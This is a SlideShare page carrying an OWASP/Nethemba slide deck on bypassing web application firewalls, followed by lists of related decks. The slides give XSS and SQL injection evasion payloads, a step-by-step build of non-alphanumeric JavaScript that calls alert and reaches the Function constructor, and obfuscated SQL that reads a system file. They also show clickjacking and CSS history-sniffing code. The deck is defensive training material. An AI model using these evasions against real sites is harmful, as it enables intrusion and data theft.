SlideShare une entreprise Scribd logo

Bypassing Web Application Firewalls

OWASP (Open Web Application Security Project)
OWASP (Open Web Application Security Project)
Technologie
1  sur  39
Télécharger pour lire hors ligne
Bypassing Web Application Firewalls (WAFs) Ing. Pavol Lupták, CISSP, CEH Lead Security Consultant          www.nethemba.com             www.nethemba.com      
Nethemba – All About Security  Highly experienced certified IT security experts (CISSP, C|EH, SCSecA)  Core business: All kinds of penetration tests, comprehensive web  application security audits, local system and wifi security audits, security  consulting, forensic analysis, secure VoIP, ultra­secure systems  OWASP activists: Leaders of Slovak/Czech OWASP chapters, co­authors  of the most recognized OWASP Testing Guide v3.0, working on new version   We are the only one in Slovakia/Czech Republic that offer:  Penetration tests and security audits of SAP  Security audit of smart RFID cards  Unique own and sponsored security research in many areas (see  our references – Vulnerabilities in public transport SMS tickets,    cracked the most used Mifare Classic RFID cards)        www.nethemba.com       
What are WAFs?  Emerged from IDS/IPS focused on HTTP  protocol and HTTP related attacks  Usually contain a lot of complex reg­exp rules  to match  Support special features like cookie encryption,  CSRF protection, etc.  Except of free mod_security they are quite  expensive (and often there is no correlation    between the price and their filtering capabilities)         www.nethemba.com       
WAFs implementations  Usually they are deployed in “blacklisting mode”  that is more vulnerable to bypasses and  targeted attacks  Application “context” (type of allowed inputs) is  necessary to know for deploying of more secure  “whitelisting mode”  All WAFs can by bypassed  WAF is just a workaround, but from the security    point of view it can be cost­effective        www.nethemba.com       
WAF filter rules  Directly reflects WAF effectiveness  For most WAF vendors they are closely  guarded secrets – most determined attackers  are able to bypass them without seeing the  actual rules  Open­source WAFs (mod_security, PHPIDS)  have open source rules which is better for  more scrutiny by skilled penetration testers          www.nethemba.com       
Typical WAF bypasses Blocked Attack Undetected modification 'or 1=1-- ' or 2=2-- alert(0) %00alert(0) <script>alert(0)</script> <script type=vbscript>MsgBox(0)</script> ' or ''''='r '/**/OR/**/''''=' <script>alert(0)</script> <img src=”x:x” onerror=”alert(0)”></img> <img src=x:x onerror=alert(0)//></img> <img src=http://url onload=alert(0)//></img> 1 or 1=1 (1)or(1)=(1) eval(name) x=this.name X(0?$:name+1)          www.nethemba.com       
Yes, WAF may be also be vulnerable!  WAF also increases the attack surface of a  target organization  WAF may be the target of and vulnerable to  malicious attacks, e.g. XSS, SQL injection,  denial­of­service attacks, remote code  execution vulnerabilities  These vulnerabilities have been found in all  types of WAF products(!)          www.nethemba.com       
Typical bypass flow  1. Find out which characters / sequences are  allowed by WAFs 2. Make an obfuscated version of your injected  payload 3. Test it and watch for the WAF/application  response 4. If it does not work, modify it and try step 2.          www.nethemba.com       
Javascript obfuscation  Javascript has very powerful features  Javascript payload is used in XSS attacks  It is full of evals, expression closures, generator  expressions, iterators, special characters and  shortcuts  Supports a lot of encodings (unicode –  multibyte characters, hexadecimal, octal,  combination of all of them)   Supports XOR, “Encryption”, Base64        www.nethemba.com       
Non­alphanumeric javascript code  Even if only few characters are allowed it is  possible to construct fully functional code:  _=[]|[];$=_++;__=(_<<_);___=(_<<_)+_;____=__+__;_____=__+___; $$=({}+"")[_____]+(+{}+"")[_]+({}[$]+"")[_]+(($!=$)+"")[___]+(($==$)+"") [$]+(($==$)+"")[_]+(($==$)++"")[__]+({}+"")[_____]+(($==$)+"")[$]+({} +"")[_]+(($==$)+"")[_];$$$=(($!=$)+"")+[_]+(($!=$)+"")[__]+(($==$)+"") [___]+(($==$)+"")[_]+(($==$)+"")[$];$_$=({}+"")[+_____]+({}+"")[_]+({} +"")[_]+(($!=$)+"")[__]+({}+"")[__+_____]+({}+"")[_____]+(+{}+"")[_]+({} [$]+"")[__]+(($==$)+"")[___]; ($)[$$][$$]($$$+"('"+$_$+"')")()    ([,Á,È,ª,É,,Ó]=!{}+{},[[Ç,µ]=!!Á+Á][ª+Ó+µ+Ç])()[Á+È+É+µ+Ç](­~Á)           www.nethemba.com       
Let's bypass WAF!  Example situation: WAF blocks alpha  characters and numbers (probably not a very  real situation, just proof­of­concept :­)  Allows only few special characters (){}_=[];$”! +<>  Let's generate fully nonalphanumeric javascript  code!           www.nethemba.com       
Possibilities of Javascript language  We can use numbers to obtain a single character  in a string, e.g. index zero for accessing the first  character ­ “abc”[0]  We can use addition (+), subtraction (­),  multiplication (*), division (/), modulus (%),  increment (++), decrement (­­)  We know that mathematical operators perform   automatic numeric conversion and string  operators perform automatic string conversion          www.nethemba.com       
Source of different alphanumeric  characters in Javascript Javascript object / String result error state {}+'' “[object Object]” +[][+[]] “NaN” [][+[]]+[] “undefined” [![]]+[] “false”   [!![]]+[]   “true”      www.nethemba.com       
Shortest Possible Ways to Create  Zero without Using Numbers Characters Result +[] 0 +`'` 0 +”`” 0 -[] 0 -`'` 0 -”`” 0          www.nethemba.com       
Generating numbers  +[] //0  ++[[]][+[]] //1  +!+[] //1  ++[++[[]][+[]]][+[]] //2  !+[]+!+[] //2  ++[++[++[[]][+[]]][+[]]][+[]] //3  !+[]+!+[]+!+[] //3          www.nethemba.com       
Gain alpha characters without  directly using them  When define Javascript object using the object  literal and concatenate with string, the result is  [object Object]  _={}+''; //[object Object]  alert(_[1]) //returns 'o' character          www.nethemba.com       
Generate string “alert” without using  any alphanumeric characters  Let's start with 'a'   What Javascript object contains 'a'?   We can use 'NaN' (Not a Number)  Access empty string with index “0” (undefined)  and convert to number (NaN)   +[][+[]] // result: NaN          www.nethemba.com       
Generating 'a' character  NaN[1]='a'  ++[[]][+[]] //1  +[][+[]]+[] // result string: NaN  (+[][+[]]+[])[++[[]][+[]]] //a  We have character 'a'          www.nethemba.com       
Generating 'l' character  Use boolean false  We can use ! (NOT) operator  e.g. ''==0 //true  Use blank array (string) and then NOT operator  to obtain boolean, wrap with [] and convert it to  string  ([![]]+[]) //string “false”          www.nethemba.com       
Generating 'l' character  ++[++[[]][+[]]][+[]] //2  ([![]]+[]) //string “false”  'false'[2] = ([![]]+[])[++[++[[]][+ []]][+[]]] // 'l'    We have 'l' character!          www.nethemba.com       
Generating 'e' character  It's easy, we can use boolean true  ([!![]]+[]) // string 'true'  ++[++[++[[]][+[]]][+[]]][+[]] //3  'true'[3] = ([!![]]+[])[++[++[++ [[]][+[]]][+[]]][+[]]] //e  And we have 'e' character!          www.nethemba.com       
Generating 'r' character  It's easy, we can use boolean true  ([!![]]+[]) // string 'true'   ++[[]][+[]] //1  'true'[1] = ([!![]]+[])[++[[]][+ []]] //r  And we have 'r' character!          www.nethemba.com       
Generating 't' character  It's easy, we can use boolean true  ([!![]]+[]) // string 'true'   +[] //0  'true'[0] = ([!![]]+[])[+[]] //t  And we have 't' character!          www.nethemba.com       
And now we have 'alert' string! (+[][+[]]+[])[++[[]][+[]]]+([![]]+ [])[++[++[[]][+[]]][+[]]]+([!![]]+ [])[++[++[++[[]][+[]]][+[]]][+[]]]+ ([!![]]+[])[++[[]][+[]]]+([!![]]+ [])[+[]] //string 'alert'          www.nethemba.com       
How to execute the code of our choice?  It is necessary to return window object to  access all properties of window   If you can access to a constructor, you can  access Function constructor to execute  arbitrary code  The shortest possible way to get window is: alert((1,[].sort)()) // shows  window object !   Works in all browsers except IE        www.nethemba.com       
How to generate 'sort' string   We know how to generate string 'alert'  We need to generate 'sort' string 'false'[3]=([![]]+[])[++[++[++[[]] [+[]]][+[]]][+[]]] //'s'   We can gain 'o' from []+{} [object Object] ([]+{})[++[[]][+[]]] //o  We have already generated 'r' and 't'          www.nethemba.com       
And now we have 'sort' string ([![]]+[])[++[++[++[[]][+[]]][+[]]][+ []]]+([]+{})[++[[]][+[]]]+([!![]]+[]) [++[[]][+[]]]+([!![]]+[])[+[]]  //string 'sort'          www.nethemba.com       
Let's build it together – call alert(1)  (1,[].sort)().alert(1)  After changing number 1 and all alpha  characters to their obfuscated version we get: ([],[][([![]]+[])[++[++[++[[]][+[]]][+[]]] [+[]]]+([]+{})[++[[]][+[]]]+([!![]]+[])[++ [[]][+[]]]+([!![]]+[])[+[]]])()[ (+[][+[]] +[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+ []]][+[]]] +([!![]]+[])[++[++[++[[]][+[]]] [+[]]][+[]]]+([!![]]+[])[++ [[]][+[]]]+ ([!![]]+[])[+[]]](++[[]][+[]])    //calls alert(1)!        www.nethemba.com       
How to call any arbitrary  Javascript function  Using the array constructor (accessing the  constructor twice from an array object returns  Function): [].constructor.constructor(“alert(1 )”)()   We need to generate the rest 'c','n','u' letters,  gain them from the output of [].sort function:   function sort() { [native code] }        www.nethemba.com       
SQL obfuscation  What is obfuscation of SQL injection vector?  Different DBMS have different SQL syntax,  most of them support Unicode, Base64, hex,  octal and binary representation, escaping,  hashing algorithms (MD5, SHA­1)  Many “blacklisted” characters can be replaced  by their functional alternatives (0xA0 in MySQL)  Obfuscated comments – it is difficult to    determine what is a comment and what is not        www.nethemba.com       
SQL obfuscation examples  SELECT CONCAT (char  (x'70617373',b'11101110110111101110010011 00100'))  s/*/e/**//*e*//*/l/*le*c*//*/ect~~/**/1    SELECT  LOAD_FILE(0x633A5C626F6F742E696E69)  (M)   SELECT(extractvalue(0x3C613E61646D696E3   C2F613, 0x2F61))        www.nethemba.com       
New SQL features  MySQL/PostgreSQL supports XML functions: SELECT UpdateXML('<script x=_></script>', '/script/@x','src=//0x.lv');  HTML5 supports local DB storage (SQLite  3.1+) (openDatabase object) – can be misused  for persistent XSS, local SQL injection attacks          www.nethemba.com       
Existing obfuscation tools  Hackvertor http://hackvertor.co.uk/public  HackBar  https://addons.mozilla.org/en­US/firefox/addon/hack  Malzilla http://malzilla.sourceforge.net/  Your imagination :)          www.nethemba.com       
Summary  WAFs are just workarounds!  The best solution is to care about security in every SDLC  phase and strictly validate all inputs and outputs in the  application  Use whitelisting instead of blacklisting (both in the  application and WAF!)  Use multilayer security ­  3rdlayer database architecture or  database firewalls  for SQL use “prepared” statements    for HTML use HTML Purifier or OWASP AntiSamy project        www.nethemba.com       
References  Web Application Obfuscation  http://www.amazon.com/Web­Application­Obfuscati  XSS Attacks: Cross Site Scripting Exploits and  Defense  http://www.amazon.com/XSS­Attacks­Scripting­Exp  Special thanks to Mario Heiderich and Stefano  Di Paola           www.nethemba.com       
UI redressing attacks­ clickjacking <style> iframe { filter: alpha(opacity=0); opacity: 0; position: absolute; top: 0px; left 0px; height: 300px; width: 250px; } img { position: absolute; top: 0px; left: 0px; height: 300px; width: 250px; } </style> <img src=”WHAT THE USERS SEES”/> <iframe src=”WHAT THE USER IS ACTUALLY INTERACTING    WITH”></iframe>        www.nethemba.com       
Clickjacking protection  Blocks using X­FRAME/OPTIONS: NEVER  <body> <script> if (top!=self)  document.write('<plaintext>'); </script> ...          www.nethemba.com       
CSS History attack <style> a { position: relative; } a:visited { position: absolute; } </style> <a id=”v” href=”http://www.google.com/”>Google</a> <script>  var l=document.getElementById(“v”); var c=getComputedStyle(l).position; c==”absolute”?alert(“visited”):alert(“not visited”);   </script>        www.nethemba.com       
CSS History exploitation methods  Social network deanonymization attacks  Session ID/CSRF token local brute force attack  LAN scanners  Fixed in Firefox 4.0, current browsers are  vulnerable          www.nethemba.com       

Recommandé

My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
Wim Godden
 
Let's write secure Drupal code! - DrupalCamp London 2019
Let's write secure Drupal code! - DrupalCamp London 2019Let's write secure Drupal code! - DrupalCamp London 2019
Let's write secure Drupal code! - DrupalCamp London 2019
Balázs Tatár
 
주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법
guestad13b55
 
Man in the Middle Attack on Banks
Man in the Middle Attack on BanksMan in the Middle Attack on Banks
Man in the Middle Attack on Banks
Marko Elezović
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
Wim Godden
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
Wim Godden
 
Web Security - Hands-on
Web Security - Hands-onWeb Security - Hands-on
Web Security - Hands-on
Andrea Valenza
 
Javascript & jQuery: A pragmatic introduction
Javascript & jQuery: A pragmatic introductionJavascript & jQuery: A pragmatic introduction
Javascript & jQuery: A pragmatic introduction
Iban Martinez
 

Recommandé

My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
Wim Godden
 
Let's write secure Drupal code! - DrupalCamp London 2019
Let's write secure Drupal code! - DrupalCamp London 2019Let's write secure Drupal code! - DrupalCamp London 2019
Let's write secure Drupal code! - DrupalCamp London 2019
Balázs Tatár
 
주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법주로사용되는 Xss필터와 이를 공격하는 방법
주로사용되는 Xss필터와 이를 공격하는 방법
guestad13b55
 
Man in the Middle Attack on Banks
Man in the Middle Attack on BanksMan in the Middle Attack on Banks
Man in the Middle Attack on Banks
Marko Elezović
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
Wim Godden
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
Wim Godden
 
Web Security - Hands-on
Web Security - Hands-onWeb Security - Hands-on
Web Security - Hands-on
Andrea Valenza
 
Javascript & jQuery: A pragmatic introduction
Javascript & jQuery: A pragmatic introductionJavascript & jQuery: A pragmatic introduction
Javascript & jQuery: A pragmatic introduction
Iban Martinez
 
Php Code Audits (PHP UK 2010)
Php Code Audits (PHP UK 2010)Php Code Audits (PHP UK 2010)
Php Code Audits (PHP UK 2010)
Damien Seguy
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
Balavignesh Kasinathan
 
Php Security By Mugdha And Anish
Php Security By Mugdha And AnishPhp Security By Mugdha And Anish
Php Security By Mugdha And Anish
OSSCube
 
Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10
Sastry Tumuluri
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
Avădănei Andrei
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricks
GarethHeyes
 
jQuery introduction
jQuery introductionjQuery introduction
jQuery introduction
Stijn Van Minnebruggen
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
CODE BLUE
 
Frontends w ithout javascript
Frontends w ithout javascriptFrontends w ithout javascript
Frontends w ithout javascript
Stephen Lorello
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
Wim Godden
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
Rodolfo Assis (Brute)
 
Web security
Web securityWeb security
Web security
davidahaskins
 
Javascript and Jquery Best practices
Javascript and Jquery Best practicesJavascript and Jquery Best practices
Javascript and Jquery Best practices
Sultan Khan
 
Introduction to PHP Lecture 1
Introduction to PHP Lecture 1Introduction to PHP Lecture 1
Introduction to PHP Lecture 1
Ajay Khatri
 
Intro to computer vision in .net update
Intro to computer vision in .net updateIntro to computer vision in .net update
Intro to computer vision in .net update
Stephen Lorello
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
Wim Godden
 
Appsec usa2013 js_libinsecurity_stefanodipaola
Appsec usa2013 js_libinsecurity_stefanodipaolaAppsec usa2013 js_libinsecurity_stefanodipaola
Appsec usa2013 js_libinsecurity_stefanodipaola
drewz lin
 
Basics of Java Script (JS)
Basics of Java Script (JS)Basics of Java Script (JS)
Basics of Java Script (JS)
Ajay Khatri
 
PHP security audits
PHP security auditsPHP security audits
PHP security audits
Damien Seguy
 
Eight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programsEight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programs
Aleksandr Yampolskiy
 
Tapping Hackers for Continuous Security: That's Hacker-Powered Security
Tapping Hackers for Continuous Security: That's Hacker-Powered SecurityTapping Hackers for Continuous Security: That's Hacker-Powered Security
Tapping Hackers for Continuous Security: That's Hacker-Powered Security
HackerOne
 
Best Practices Guide: Introducing Web Application Firewalls
Best Practices Guide: Introducing Web Application FirewallsBest Practices Guide: Introducing Web Application Firewalls
Best Practices Guide: Introducing Web Application Firewalls
alexmeisel
 

Contenu connexe

Tendances

Php Code Audits (PHP UK 2010)
Php Code Audits (PHP UK 2010)Php Code Audits (PHP UK 2010)
Php Code Audits (PHP UK 2010)
Damien Seguy
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
CODE BLUE
 
Appsec usa2013 js_libinsecurity_stefanodipaola
Appsec usa2013 js_libinsecurity_stefanodipaolaAppsec usa2013 js_libinsecurity_stefanodipaola
Appsec usa2013 js_libinsecurity_stefanodipaola
drewz lin
 
Eight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programsEight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programs
Aleksandr Yampolskiy
 

Tendances (20)

Php Code Audits (PHP UK 2010)
Php Code Audits (PHP UK 2010)Php Code Audits (PHP UK 2010)
Php Code Audits (PHP UK 2010)
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
 
Php Security By Mugdha And Anish
Php Security By Mugdha And AnishPhp Security By Mugdha And Anish
Php Security By Mugdha And Anish
 
Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricks
 
jQuery introduction
jQuery introductionjQuery introduction
jQuery introduction
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
 
Frontends w ithout javascript
Frontends w ithout javascriptFrontends w ithout javascript
Frontends w ithout javascript
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
 
Web security
Web securityWeb security
Web security
 
Javascript and Jquery Best practices
Javascript and Jquery Best practicesJavascript and Jquery Best practices
Javascript and Jquery Best practices
 
Introduction to PHP Lecture 1
Introduction to PHP Lecture 1Introduction to PHP Lecture 1
Introduction to PHP Lecture 1
 
Intro to computer vision in .net update
Intro to computer vision in .net updateIntro to computer vision in .net update
Intro to computer vision in .net update
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
 
Appsec usa2013 js_libinsecurity_stefanodipaola
Appsec usa2013 js_libinsecurity_stefanodipaolaAppsec usa2013 js_libinsecurity_stefanodipaola
Appsec usa2013 js_libinsecurity_stefanodipaola
 
Basics of Java Script (JS)
Basics of Java Script (JS)Basics of Java Script (JS)
Basics of Java Script (JS)
 
PHP security audits
PHP security auditsPHP security audits
PHP security audits
 
Eight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programsEight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programs
 

En vedette

Best Practices Guide: Introducing Web Application Firewalls
Best Practices Guide: Introducing Web Application FirewallsBest Practices Guide: Introducing Web Application Firewalls
Best Practices Guide: Introducing Web Application Firewalls
alexmeisel
 
Apache mod security 3.1
Apache mod security 3.1Apache mod security 3.1
Apache mod security 3.1
Hai Dinh Tuan
 
Web Intrusion Detection
Web Intrusion Detection Web Intrusion Detection
Web Intrusion Detection
Abhishek Singh
 
OWASP ModSecurity Core Rules Paranoia Mode
OWASP ModSecurity Core Rules Paranoia ModeOWASP ModSecurity Core Rules Paranoia Mode
OWASP ModSecurity Core Rules Paranoia Mode
Christian Folini
 
Benefits of web application firewalls
Benefits of web application firewallsBenefits of web application firewalls
Benefits of web application firewalls
EnclaveSecurity
 

En vedette (10)

Tapping Hackers for Continuous Security: That's Hacker-Powered Security
Tapping Hackers for Continuous Security: That's Hacker-Powered SecurityTapping Hackers for Continuous Security: That's Hacker-Powered Security
Tapping Hackers for Continuous Security: That's Hacker-Powered Security
 
Best Practices Guide: Introducing Web Application Firewalls
Best Practices Guide: Introducing Web Application FirewallsBest Practices Guide: Introducing Web Application Firewalls
Best Practices Guide: Introducing Web Application Firewalls
 
Protecting TYPO3 With Suhosin And Modsecurity
Protecting TYPO3 With Suhosin And ModsecurityProtecting TYPO3 With Suhosin And Modsecurity
Protecting TYPO3 With Suhosin And Modsecurity
 
Apache mod security 3.1
Apache mod security 3.1Apache mod security 3.1
Apache mod security 3.1
 
Web Intrusion Detection
Web Intrusion Detection Web Intrusion Detection
Web Intrusion Detection
 
WAF in Scale
WAF in ScaleWAF in Scale
WAF in Scale
 
OWASP ModSecurity Core Rules Paranoia Mode
OWASP ModSecurity Core Rules Paranoia ModeOWASP ModSecurity Core Rules Paranoia Mode
OWASP ModSecurity Core Rules Paranoia Mode
 
Benefits of web application firewalls
Benefits of web application firewallsBenefits of web application firewalls
Benefits of web application firewalls
 
Anatomy of an Attack - Sophos Day Belux 2014
Anatomy of an Attack - Sophos Day Belux 2014Anatomy of an Attack - Sophos Day Belux 2014
Anatomy of an Attack - Sophos Day Belux 2014
 
Radware - WAF (Web Application Firewall)
Radware - WAF (Web Application Firewall)Radware - WAF (Web Application Firewall)
Radware - WAF (Web Application Firewall)
 

Similaire à Bypassing Web Application Firewalls

Cross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaCross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with Java
Jim Manico
 
I thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupI thought you were my friend - Malicious Markup
I thought you were my friend - Malicious Markup
Mario Heiderich
 
Slides
SlidesSlides
Slides
vti
 
The Ultimate IDS Smackdown
The Ultimate IDS SmackdownThe Ultimate IDS Smackdown
The Ultimate IDS Smackdown
Mario Heiderich
 
Mario heiderich. got your nose! how to steal your precious data without using...
Mario heiderich. got your nose! how to steal your precious data without using...Mario heiderich. got your nose! how to steal your precious data without using...
Mario heiderich. got your nose! how to steal your precious data without using...
Yury Chemerkin
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
Slawomir Jasek
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
SecuRing
 

Similaire à Bypassing Web Application Firewalls (20)

JavaScript Obfuscation
JavaScript ObfuscationJavaScript Obfuscation
JavaScript Obfuscation
 
Java script obfuscation
Java script obfuscationJava script obfuscation
Java script obfuscation
 
Ajax Security
Ajax SecurityAjax Security
Ajax Security
 
Web Application Defences
Web Application DefencesWeb Application Defences
Web Application Defences
 
Cross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaCross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with Java
 
I thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupI thought you were my friend - Malicious Markup
I thought you were my friend - Malicious Markup
 
Slides
SlidesSlides
Slides
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG Presentation
 
Pascarello_Investigating JavaScript and Ajax Security
Pascarello_Investigating JavaScript and Ajax SecurityPascarello_Investigating JavaScript and Ajax Security
Pascarello_Investigating JavaScript and Ajax Security
 
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...
 
The Ultimate IDS Smackdown
The Ultimate IDS SmackdownThe Ultimate IDS Smackdown
The Ultimate IDS Smackdown
 
XSS Defence with @manicode and @eoinkeary
XSS Defence with @manicode and @eoinkearyXSS Defence with @manicode and @eoinkeary
XSS Defence with @manicode and @eoinkeary
 
Mario heiderich. got your nose! how to steal your precious data without using...
Mario heiderich. got your nose! how to steal your precious data without using...Mario heiderich. got your nose! how to steal your precious data without using...
Mario heiderich. got your nose! how to steal your precious data without using...
 
Wi-Foo Ninjitsu Exploitation
Wi-Foo Ninjitsu ExploitationWi-Foo Ninjitsu Exploitation
Wi-Foo Ninjitsu Exploitation
 
Java Script ppt
Java Script pptJava Script ppt
Java Script ppt
 
[Poland] It's only about frontend
[Poland] It's only about frontend[Poland] It's only about frontend
[Poland] It's only about frontend
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2
 

Plus de OWASP (Open Web Application Security Project)

Plus de OWASP (Open Web Application Security Project) (16)

Paralelni polisweb
Paralelni poliswebParalelni polisweb
Paralelni polisweb
 
Nethemba - Writing exploits
Nethemba - Writing exploitsNethemba - Writing exploits
Nethemba - Writing exploits
 
Preco sa rozhodnut pre spolocnost Nethemba
Preco sa rozhodnut pre spolocnost NethembaPreco sa rozhodnut pre spolocnost Nethemba
Preco sa rozhodnut pre spolocnost Nethemba
 
Planning the OWASP Testing Guide v4
Planning the OWASP Testing Guide v4Planning the OWASP Testing Guide v4
Planning the OWASP Testing Guide v4
 
Nethemba metasploit
Nethemba metasploitNethemba metasploit
Nethemba metasploit
 
Sms ticket-hack4
Sms ticket-hack4Sms ticket-hack4
Sms ticket-hack4
 
Se linux course1
Se linux course1Se linux course1
Se linux course1
 
Real web-attack-scenario
Real web-attack-scenarioReal web-attack-scenario
Real web-attack-scenario
 
Practical web-attacks2
Practical web-attacks2Practical web-attacks2
Practical web-attacks2
 
Php sec
Php secPhp sec
Php sec
 
Nove trendy-zranitelnosti
Nove trendy-zranitelnostiNove trendy-zranitelnosti
Nove trendy-zranitelnosti
 
New web attacks-nethemba
New web attacks-nethembaNew web attacks-nethemba
New web attacks-nethemba
 
Nethemba profil
Nethemba profilNethemba profil
Nethemba profil
 
Mifare classic-slides
Mifare classic-slidesMifare classic-slides
Mifare classic-slides
 
1.nove trendy-zranitelnosti luptak
1.nove trendy-zranitelnosti luptak1.nove trendy-zranitelnosti luptak
1.nove trendy-zranitelnosti luptak
 
Nethemba profil
Nethemba profilNethemba profil
Nethemba profil
 

Dernier

TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc
 
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Orbitshub
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Orbitshub
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 

Dernier (20)

CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistan
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
Vector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptxVector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptx
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
 
Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
AI in Action: Real World Use Cases by Anitaraj
AI in Action: Real World Use Cases by AnitarajAI in Action: Real World Use Cases by Anitaraj
AI in Action: Real World Use Cases by Anitaraj
 
